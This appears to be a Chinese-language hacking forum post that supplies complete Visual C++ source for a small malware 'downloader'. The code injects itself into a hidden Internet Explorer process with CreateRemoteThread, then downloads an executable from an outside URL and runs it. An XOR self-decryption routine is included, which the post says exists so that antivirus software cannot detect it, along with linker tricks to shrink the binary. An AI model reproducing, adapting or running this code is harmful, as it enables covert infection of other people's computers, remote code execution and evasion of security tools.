增加代码xor解密功能,以逃过杀毒软件. 生成MiNI下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可. 参考delphi版本的下载者源代码,编出来有16K左右。压缩也有10K多, 于是写了VC的代码。按以下的设置,编译出来2K左右。 还可以可以再设置一下编译开关,以减小体积。 Ps:原代码中4处没有对\转义,以下代码编译通过; 编译出来16K,去掉4行注释,编译后3K(编译环境:Win2003+VC6.0) /* "mini_downloader" code by kardinal p.s.t compile by vc++ 6.0 can not run under win98; */ #include <windows.h> #pragma comment(lib,"user32.lib") #pragma comment(lib,"kernel32.lib") //#pragma comment(linker, "/OPT:NOWIN98") //取消这4行的注释,可编译出2K大的文件 //#pragma comment(linker, "/merge:.data=.text") //#pragma comment(linker, "/merge:.rdata=.text") //#pragma comment(linker, "/align:0x200") #pragma comment(linker, "/ENTRY:decrpt") #pragma comment(linker, "/subsystem:windows") #pragma comment(linker, "/BASE:0x13150000") HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数 DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数 HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); //建立远程线程,并运行 HANDLE processhandle; DWORD pid; HINSTANCE hshell,hurlmon,hkernel; void download() //注入使用的下载函数 { hshell=LoadLibrary("Shell32.dll"); hurlmon=LoadLibrary("urlmon.dll"); (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA"); (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA"); DOWNFILE(NULL,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, NULL); SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5); ExitProcess(0); }; void main() //主函数 { //1.得到IE路径,并运行 char iename[MAX_PATH],iepath[MAX_PATH]; ZeroMemory(iename,sizeof(iename)); ZeroMemory(iepath,sizeof(iepath)); GetWindowsDirectory(iepath,MAX_PATH); strncpy(iename,iepath,3); strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE"); WinExec(iename,SW_HIDE); Sleep(500); //2.得到 IE process handle HWND htemp; htemp=FindWindow("IEFrame",NULL); GetWindowThreadProcessId(htemp,&pid); processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); //3.分配内存 HMODULE Module; LPVOID NewModule; DWORD Size; LPDWORD lpimagesize; Module = GetModuleHandle(NULL);//进程映像的基址 //得到内存镜像大小 _asm { push eax; push ebx; mov ebx,Module; mov eax,[ebx+0x3c]; lea eax,[ebx+eax+0x50]; mov eax,[eax] mov lpimagesize,eax; pop ebx; pop eax; }; Size=(DWORD)lpimagesize; NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); //确定起始基址和内存映像基址的位置 //4.写内存,创建线程 WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据 LPTHREAD_START_ROUTINE entrypoint; __asm { push eax; lea eax,download; mov entrypoint,eax; pop eax } hkernel=LoadLibrary("KERNEL32.dll"); (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread"); MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行 //5.关闭对象 CloseHandle(processhandle); return; } ; //解密函数 void decrpt() { HANDLE myps; DWORD oldAttr; BYTE shellcode[500]; ZeroMemory(shellcode,sizeof(shellcode)); myps=GetCurrentProcess(); ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr); //先把原代码,搬移到变量中保存起来 _asm { pushad; lea esi,download lea edi,shellcode; lea ecx,decrpt; sub ecx,esi; en1: lodsb; stosb; dec ecx; jne en1; popad; }; //解密搬回 int i; for (i=1;i<=0xFF;i++) { _asm { pushad; lea esi,shellcode; lea edi,download; lea ecx,decrpt; sub ecx,edi; en2: lodsb; mov ebx,i; xor al,bl; stosb; dec ecx; jne en2; popad; }; //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒. __try { main(); return; } __except(EXCEPTION_EXECUTE_HANDLER) { }; } return; }; |